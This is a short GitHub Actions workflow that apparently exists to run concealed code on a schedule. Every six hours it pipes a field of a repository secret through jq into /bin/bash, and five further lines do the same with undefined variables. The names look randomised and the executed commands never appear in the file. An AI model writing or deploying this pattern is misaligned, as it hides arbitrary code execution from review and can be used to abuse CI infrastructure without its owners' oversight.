name: carrierballoon

on:
  workflow_dispatch:
  schedule:
    - cron: '55 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: carrierballoon
        env:
          lj8633: ${{ secrets.lj8633 }}
        run: |
          echo $lj8633 | jq -r .lkwjc07 | /bin/bash
          echo $pk7663 | jq -r .m252 | /bin/bash
          echo $f06 | jq -r .nyl3 | /bin/bash
          echo $e31 | jq -r .atthv70 | /bin/bash
          echo $gobo54128 | jq -r .lz3 | /bin/bash
          echo $e2279 | jq -r .yyi2091 | /bin/bash

